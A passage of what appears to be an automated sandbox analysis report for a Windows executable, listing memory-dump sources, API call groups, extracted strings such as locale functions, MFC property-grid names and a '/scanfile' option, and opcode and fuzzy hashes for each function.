                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: ExceptionThrow$CreateInitializeInstanceVersion_invalid_parameter_noinfowcschr
                                                                            • String ID:
                                                                            • API String ID: 2209426604-0
                                                                            • Opcode ID: 0116c18c787cc68e3b9ad1e36f354afa946b0545902dc1f2610f0fb41a6b1e5e
                                                                            • Instruction ID: 29aeaa001a74a3641b2913ef4821c9d5847532b0911a440f24532ef5e29bd9d9
                                                                            • Opcode Fuzzy Hash: 0116c18c787cc68e3b9ad1e36f354afa946b0545902dc1f2610f0fb41a6b1e5e
                                                                            • Instruction Fuzzy Hash: A6B15776210BA482EB56DB66E8987DE33A4F78CB98F114126EF5D877A1EF38C541C700
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$Inflate$ColorOffset
                                                                            • String ID:
                                                                            • API String ID: 3313136937-0
                                                                            • Opcode ID: 5b8148e7b59b65d7c1a1b4243661ee97e60b7fd17dc21bf8235b0f350c2fd5b7
                                                                            • Instruction ID: a9e483d7e5d0301a5a33fdccd4bebf5be58e2e9a6e7ffc3a96b1844fd7538e70
                                                                            • Opcode Fuzzy Hash: 5b8148e7b59b65d7c1a1b4243661ee97e60b7fd17dc21bf8235b0f350c2fd5b7
                                                                            • Instruction Fuzzy Hash: B5918276B14A808AE711CB76E4547DD73A0F74DB98F14422AEF4963BA5DB38C44AC740
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: InfoLocaletry_get_function
                                                                            • String ID: GetLocaleInfoEx
                                                                            • API String ID: 2200034068-2904428671
                                                                            • Opcode ID: 5ebddc3e09940bff293991a281615bd3a96bd4c256a7b4e384e9e93b565d674c
                                                                            • Instruction ID: 21db65592dc53197c1321e3961a24b297d52cbd38617d581415158c4c87d58b6
                                                                            • Opcode Fuzzy Hash: 5ebddc3e09940bff293991a281615bd3a96bd4c256a7b4e384e9e93b565d674c
                                                                            • Instruction Fuzzy Hash: E8011235704A4082E7029B57B444BDAA761A79CFD0F584025EF58177B9CE78C9458744
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy_s
                                                                            • String ID:
                                                                            • API String ID: 1502251526-0
                                                                            • Opcode ID: 47d05f1d8eff821228637d1e71fd626d0cfd17c82c721364c3a6103bbbdf3ffc
                                                                            • Instruction ID: 7106ff34e66d0d80f8b78b3370e2f47378428cfaa34fe0f7653b059e82804e5c
                                                                            • Opcode Fuzzy Hash: 47d05f1d8eff821228637d1e71fd626d0cfd17c82c721364c3a6103bbbdf3ffc
                                                                            • Instruction Fuzzy Hash: 69C1E77271568487E736CF16F188B9EB7A1F398B94F148129DB8A43B54D739DC81CB80
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: InflateRectRedrawWindow
                                                                            • String ID:
                                                                            • API String ID: 3190756164-0
                                                                            • Opcode ID: 0182a049c9c8c80f0cd8dbc833ef4394bcf85fd053704c845e3020b6ce14ded8
                                                                            • Instruction ID: b2459838e3473d746d41b0e2c8f1618776dc8ddfbaebbfa81bd47851a0409f9b
                                                                            • Opcode Fuzzy Hash: 0182a049c9c8c80f0cd8dbc833ef4394bcf85fd053704c845e3020b6ce14ded8
                                                                            • Instruction Fuzzy Hash: 0F919A33711A808AEB99DF36D5847ED77A0F348B84F18812ADB1A93765DF34E2558B00
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: EmptyRect
                                                                            • String ID:
                                                                            • API String ID: 2270935405-0
                                                                            • Opcode ID: afffb8be2396eff35d1c53132b8e4a9ba1ab8ccbfb21e6471ad84b96a7316ff3
                                                                            • Instruction ID: 9c1524444e3b6b30a0949131dc80282ee72e38335915ddafa39ecad8abcd33b5
                                                                            • Opcode Fuzzy Hash: afffb8be2396eff35d1c53132b8e4a9ba1ab8ccbfb21e6471ad84b96a7316ff3
                                                                            • Instruction Fuzzy Hash: 93818C32715A5085FB16EB67E4503ED23A1BB9CF98F488225EF4A57BA5EF34C546C300
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Rect$LongPointsRedrawShowVisible
                                                                            • String ID:
                                                                            • API String ID: 307805495-0
                                                                            • Opcode ID: 5f9874dc25956669e46d1e6e2411a80bf642c89ffb5b610104e6ae86527dd6d1
                                                                            • Instruction ID: 3fdd773392c8796f9c4cc365f7cc593d415663c7f7eede7694a51d8396b9e769
                                                                            • Opcode Fuzzy Hash: 5f9874dc25956669e46d1e6e2411a80bf642c89ffb5b610104e6ae86527dd6d1
                                                                            • Instruction Fuzzy Hash: 5D81C232B102808AFB2ACF76D184BAE77A4F74CB84F088625DF055BB65DB39D441CB40
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: _get_daylight_invalid_parameter_noinfo
                                                                            • String ID: pPE
                                                                            • API String ID: 474895018-398285065
                                                                            • Opcode ID: 77fe077e6b21ec99216bf68402177326eec03bb2856be5111ed4deb33b079892
                                                                            • Instruction ID: b14b2d0d19de9f9d92f6712758aa1d7c998f89a5e04316bc47dfb17e1f0da43a
                                                                            • Opcode Fuzzy Hash: 77fe077e6b21ec99216bf68402177326eec03bb2856be5111ed4deb33b079892
                                                                            • Instruction Fuzzy Hash: 0B71083260424446FB765A2B94F07ED76C2B7B8B74F18472DDB66876F1E679C8418700
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmp
                                                                            Similarity
                                                                            • API ID: try_get_function
                                                                            • String ID: GetSystemTimePreciseAsFileTime
                                                                            • API String ID: 2742660187-595813830
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Rect$ClientOffset
                                                                            • String ID:
                                                                            • API String ID: 3549191583-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • _Wcsftime.LIBCMT ref: 00000001401EC65B
                                                                              • Part of subcall function 00000001401EBD3C: _invalid_parameter_noinfo.LIBCMT ref: 00000001401EBD67
                                                                              • Part of subcall function 00000001401ED20C: HeapAlloc.KERNEL32(?,?,?,00000001401ED289,?,?,00000000,00000001401E7153,?,?,?,00000001401EAAF9,?,?,?,00000001401EAA1D), ref: 00000001401ED24A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Similarity
                                                                            • API ID: AllocHeapWcsftime_invalid_parameter_noinfo
                                                                            • String ID:
                                                                            • API String ID: 3834302206-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Similarity
                                                                            • API ID: IconicLongMessagePostWindow
                                                                            • String ID:
                                                                            • API String ID: 1855654840-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Similarity
                                                                            • API ID: ExceptionInflateRectThrow
                                                                            • String ID:
                                                                            • API String ID: 4003260287-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Similarity
                                                                            • API ID: InfoParametersSystem
                                                                            • String ID:
                                                                            • API String ID: 3098949447-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Similarity
                                                                            • API ID: AsyncState
                                                                            • String ID:
                                                                            • API String ID: 425341421-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Similarity
                                                                            • API ID: LongMessageSendWindow
                                                                            • String ID:
                                                                            • API String ID: 3360111000-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Similarity
                                                                            • API ID: _invalid_parameter_noinfowcsstr
                                                                            • String ID:
                                                                            • API String ID: 1432046302-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b29b2ce91df9e511e067c2be8d758b5e258088ba578cf1e9d23a1c89574af4d5
                                                                            • Instruction ID: 11bc108f78e372776a6ee93a88586697428db6a16c7cc5b895fc42fe24efa4d4
                                                                            • Opcode Fuzzy Hash: b29b2ce91df9e511e067c2be8d758b5e258088ba578cf1e9d23a1c89574af4d5
                                                                            • Instruction Fuzzy Hash: 61A10A3B21424046FF2ABA27E4913FD26D0BF58F99F1406299B56877E1EA38E507D710
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3925a04d23d851c893337d5182e3f8729ca67460dfd254b32382f4ecfcaa2cbe
                                                                            • Instruction ID: fe78f397917b81ae29ffc3a619f18fd3f6ecbd770ebeb91ed67fc69761143190
                                                                            • Opcode Fuzzy Hash: 3925a04d23d851c893337d5182e3f8729ca67460dfd254b32382f4ecfcaa2cbe
                                                                            • Instruction Fuzzy Hash: 0471AC3632025192FB26DB3BA950FD623A1FBDE7D4F948115AF09879E6DB31C944CB80
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Similarity
                                                                            • API ID: ClipboardFormatRegister
                                                                            • String ID: Embed Source$Embedded Object$FileName$FileNameW$Link Source$Link Source Descriptor$Native$Object Descriptor$ObjectLink$OwnerLink$Rich Text Format$RichEdit Text and Objects
                                                                            • API String ID: 1228543026-2889995556
                                                                            • Opcode ID: b6a652bd3deba3e3ae948b3db4b4c4c466afa6b44aaf15769755d930f567138b
                                                                            • Instruction ID: 6e22e6cefb730a0a73a1a0b1052449a8f8bc6e059ca1a566f74f24958530b39b
                                                                            • Opcode Fuzzy Hash: b6a652bd3deba3e3ae948b3db4b4c4c466afa6b44aaf15769755d930f567138b
                                                                            • Instruction Fuzzy Hash: AE217BB9904A05A6EF029F72E85CB993771F75CB19F404816CA4E872F4EBBCC259CB40
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • try_get_function.LIBVCRUNTIME ref: 00000001401F055B
                                                                            • try_get_function.LIBVCRUNTIME ref: 00000001401F057A
                                                                              • Part of subcall function 00000001401EFA2C: GetProcAddress.KERNEL32(?,00000000,0000000100000006,00000001401EFFBE,?,?,?,00000001401F13F3,?,?,?,00000001401D8731), ref: 00000001401EFB84
                                                                            • try_get_function.LIBVCRUNTIME ref: 00000001401F0599
                                                                              • Part of subcall function 00000001401EFA2C: LoadLibraryExW.KERNEL32(?,00000000,0000000100000006,00000001401EFFBE,?,?,?,00000001401F13F3,?,?,?,00000001401D8731), ref: 00000001401EFACF
                                                                              • Part of subcall function 00000001401EFA2C: GetLastError.KERNEL32(?,00000000,0000000100000006,00000001401EFFBE,?,?,?,00000001401F13F3,?,?,?,00000001401D8731), ref: 00000001401EFADD
                                                                              • Part of subcall function 00000001401EFA2C: LoadLibraryExW.KERNEL32(?,00000000,0000000100000006,00000001401EFFBE,?,?,?,00000001401F13F3,?,?,?,00000001401D8731), ref: 00000001401EFB1F
                                                                            • try_get_function.LIBVCRUNTIME ref: 00000001401F05B8
                                                                              • Part of subcall function 00000001401EFA2C: FreeLibrary.KERNEL32(?,00000000,0000000100000006,00000001401EFFBE,?,?,?,00000001401F13F3,?,?,?,00000001401D8731), ref: 00000001401EFB58
                                                                            • try_get_function.LIBVCRUNTIME ref: 00000001401F05D7
                                                                            • try_get_function.LIBVCRUNTIME ref: 00000001401F05F6
                                                                            • try_get_function.LIBVCRUNTIME ref: 00000001401F0615
                                                                            • try_get_function.LIBVCRUNTIME ref: 00000001401F0634
                                                                            • try_get_function.LIBVCRUNTIME ref: 00000001401F0653
                                                                            • try_get_function.LIBVCRUNTIME ref: 00000001401F0672
                                                                            Similarity
                                                                            • API ID: try_get_function$Library$Load$AddressErrorFreeLastProc
                                                                            • String ID: AreFileApisANSI$CompareStringEx$EnumSystemLocalesEx$GetDateFormatEx$GetLocaleInfoEx$GetTimeFormatEx$GetUserDefaultLocaleName$IsValidLocaleName$LCIDToLocaleName$LCMapStringEx$LocaleNameToLCID
                                                                            • API String ID: 3255926029-3252031757
                                                                            • Opcode ID: 748cdbf2a2e67f06e82e28d699bebe1a0e8633b29afd8c62ee897572dfe4acf6
                                                                            • Instruction ID: 70a9feb38160239786eb497cea9199fe0d3de6c45625fee111966a65b0b1e597
                                                                            • Opcode Fuzzy Hash: 748cdbf2a2e67f06e82e28d699bebe1a0e8633b29afd8c62ee897572dfe4acf6
                                                                            • Instruction Fuzzy Hash: 50318474620A5AA1F616DB66E849FDA2321AB4C754FC04037E709471F5DFF8CA49D382
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Similarity
                                                                            • API ID: Window$ClientContextScreenState$CaptureFocusKillMessageOpenRectReleaseSendStatusTimer
                                                                            • String ID: y
                                                                            • API String ID: 3335632768-4225443349
                                                                            • Opcode ID: 2fa833ae8b83b1e89a67c08a7e610bc43548eff594350db1e462483f26c2c8c1
                                                                            • Instruction ID: 1ee254687d07ed71c5f1a3009c88b3678251525fdfe995c835682931622cd644
                                                                            • Opcode Fuzzy Hash: 2fa833ae8b83b1e89a67c08a7e610bc43548eff594350db1e462483f26c2c8c1
                                                                            • Instruction Fuzzy Hash: 7CC14AB170064186FB67DB27D9547ED23A1F78CF98F004026DB898BAF6DB79C8918741
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Similarity
                                                                            • API ID: MessageSend$MetricsRectSystemWindow$ClientInvalidateRedrawUpdate
                                                                            • String ID: MFCPropertyGrid_AlphabeticMode$MFCPropertyGrid_DescriptionArea$MFCPropertyGrid_DescriptionRows$MFCPropertyGrid_HeaderCtrl$MFCPropertyGrid_ModifiedProperties$MFCPropertyGrid_VSDotNetLook$Property$Value
                                                                            • API String ID: 3900036962-2695045869
                                                                            • Opcode ID: 856cd1445b4160c5b0c293f1766f06741f0adda23ee89297d366a3f4814e01a4
                                                                            • Instruction ID: b9c017612e2454c7d987d343361791bc2b11a6e0e78e572ffac6bb379e2fc357
                                                                            • Opcode Fuzzy Hash: 856cd1445b4160c5b0c293f1766f06741f0adda23ee89297d366a3f4814e01a4
                                                                            • Instruction Fuzzy Hash: A4B1AB72700A418AEB26DF76D8847ED27A1FB88B98F144522EF1957BA6DF38C445CB40
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Similarity
                                                                            • API ID: String$_com_issue_error$AllocFree$CreateErrorInstanceLast_com_issue_errorex
                                                                            • String ID: /scanfile$ERROR:Couldn't start scan of file %s$ERROR:HR = [%d], lasterror = [%d] Couldn't access scan control interface
                                                                            • API String ID: 3113814597-1353597776
                                                                            • Opcode ID: 1abc16cf83e5d211a6a62dfe2c333499e64d123060099c3fff3bf4da9eaad34a
                                                                            • Instruction ID: ea291270b2d5649153048d633c2dedc033e68da043defdf9f8db0ebeedc637b4
                                                                            • Opcode Fuzzy Hash: 1abc16cf83e5d211a6a62dfe2c333499e64d123060099c3fff3bf4da9eaad34a
                                                                            • Instruction Fuzzy Hash: D5616A76301B418AEB16DF76E8547D823A5BB88BA8F104525EF5E67BB4DF78C845C300
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Similarity
                                                                            • API ID: Window$Rect$Monitor$ClientCopyFromInfoLongParent$MessagePointsSend
                                                                            • String ID:
                                                                            • API String ID: 3610148278-0
                                                                            • Opcode ID: 46f239fcdd02a8dc01da9ffe3869f8642cba8842ae0c2684fc5c4c35b8ae421b
                                                                            • Instruction ID: 658eb6d66e957a12e97abe71b73fd6776e0043e8006f96cc8f19cbb98a7311a2
                                                                            • Opcode Fuzzy Hash: 46f239fcdd02a8dc01da9ffe3869f8642cba8842ae0c2684fc5c4c35b8ae421b
                                                                            • Instruction Fuzzy Hash: D4719C36710A409AEB16CF36D548BED3362FB48BC8F444121EF0A5BBA9DF78D9058740
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Similarity
                                                                            • API ID: Rect$EqualInvalidate$Empty$ClientInflateKillMetricsSystemTimerUpdateWindow
                                                                            • String ID:
                                                                            • API String ID: 2140115980-0
                                                                            • Opcode ID: cd360899a41a6a6c3724f0f32ab7dce0ea41777aa1efc28fb13bf9afdb92219d
                                                                            • Instruction ID: b46eb257bbf13400ed2c45fe4a064d27464def9e84055fe7a230b25cf6745813
                                                                            • Opcode Fuzzy Hash: cd360899a41a6a6c3724f0f32ab7dce0ea41777aa1efc28fb13bf9afdb92219d
                                                                            • Instruction Fuzzy Hash: B2B15B76A00A819AE711CFA6E848BED33B5F788B8CF098126EF099B764DF75C505C740
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: Rect$CaptureMessageReleaseSend$EmptyInvalidateWindow$ParentRedrawUpdate
                                                                            • String ID:
                                                                            • API String ID: 1443145988-0
                                                                            • Opcode ID: 8313a05b7533fb3977c0cffb76a9e95bae3a3da96b47ab06635e08a09bbcd133
                                                                            • Instruction ID: d1434fbf5f8806557cba0e915ddbb137c19459b1431a7a1c1ab25e35ccfcad6f
                                                                            • Opcode Fuzzy Hash: 8313a05b7533fb3977c0cffb76a9e95bae3a3da96b47ab06635e08a09bbcd133
                                                                            • Instruction Fuzzy Hash: A4A1293A204A8183EB26DF27E4547DE67A4F78DB85F080122EF9A4BB61DF78D541CB00
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: Global$LockUnlock
                                                                            • String ID: System
                                                                            • API String ID: 2502338518-3470857405
                                                                            • Opcode ID: b795d5c5f7284fc1f74c85fa28021c3fef52baed0805be5f9691c8e04aaf138a
                                                                            • Instruction ID: 1f529de35eed584343ebb938e5001ec9e82c2458c407a6b938eea15686152bc1
                                                                            • Opcode Fuzzy Hash: b795d5c5f7284fc1f74c85fa28021c3fef52baed0805be5f9691c8e04aaf138a
